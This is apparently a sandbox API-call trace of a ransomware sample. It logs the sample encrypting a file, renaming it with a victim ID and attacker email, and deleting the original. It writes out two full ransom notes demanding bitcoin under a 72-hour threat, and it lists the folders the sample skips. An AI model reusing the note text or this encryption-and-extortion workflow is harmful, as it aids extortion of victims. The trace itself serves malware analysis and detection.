	[0173.655] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.655] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb8ff0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb9670) returned 1
	[0173.655] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.656] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x15c, dwBufLen=0x15c | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x160) returned 1
	[0173.656] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.656] RtlMoveMemory (in: Destination=0xfdc770, Source=0xfdcd58, Length=0x15c | out: Destination=0xfdc770) 
	[0173.656] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.656] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x15c, dwBufLen=0x160 | out: pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x160) returned 1
	[0173.657] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.657] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0173.657] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.657] CryptDestroyHash (hHash=0xfb8ff0) returned 1
	[0173.658] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.658] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0173.658] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.658] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.659] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.659] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0173.660] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0173.660] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0173.661] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc770*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc770*, lpNumberOfBytesWritten=0x189938*=0x160, lpOverlapped=0x0) returned 1
	[0173.664] CloseHandle (hObject=0x3a0) returned 1
	[0173.665] CloseHandle (hObject=0x39c) returned 1
	[0173.665] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml")) returned 1
	[0173.669] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml")) returned 0
	[0173.670] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c7056c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c7056c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c7056c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0173.670] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0173.670] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0173.670] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov"
	[0173.670] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*.*"
	[0173.671] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.671] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.671] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0173.671] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.672] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0173.672] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0173.675] CloseHandle (hObject=0x390) returned 1
	[0173.676] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.676] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.676] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0173.677] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0173.678] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.678] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0173.678] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0173.678] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0173.678] CloseHandle (hObject=0x390) returned 1
	[0173.679] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.679] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.679] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0173.679] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0173.679] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.684] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0173.684] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0173.697] CloseHandle (hObject=0x390) returned 1
	[0173.698] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.698] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.699] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.699] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0173.700] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.700] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.701] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0173.701] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.701] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0173.702] CloseHandle (hObject=0x390) returned 1
	[0173.702] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x810a3c98, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x810c9d42, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0173.702] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*.*") returned 89
	[0173.702] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.702] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*") returned 0x59
	[0173.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.703] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0173.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.703] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0173.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.703] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0173.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.704] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.704] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0173.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.704] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0173.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.704] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.705] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0173.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.705] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0173.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.705] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0173.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.705] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0173.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0173.706] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.706] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0173.706] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0173.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0173.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0173.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0173.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.708] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0173.708] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0173.708] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0173.708] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x810a3c98, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x810c9d42, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="..", cAlternateFileName="")) returned 1
	[0173.708] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0173.708] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x810c9d42, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x810c9d42, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81116438, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0173.708] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x810c9d42, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x810c9d42, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x810c9d42, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0173.708] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0173.709] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0173.709] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0173.709] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov"
	[0173.709] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\"
	[0173.709] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime"
	[0173.709] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime"
	[0173.709] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\"
	[0173.709] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\"
	[0173.710] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*.*"
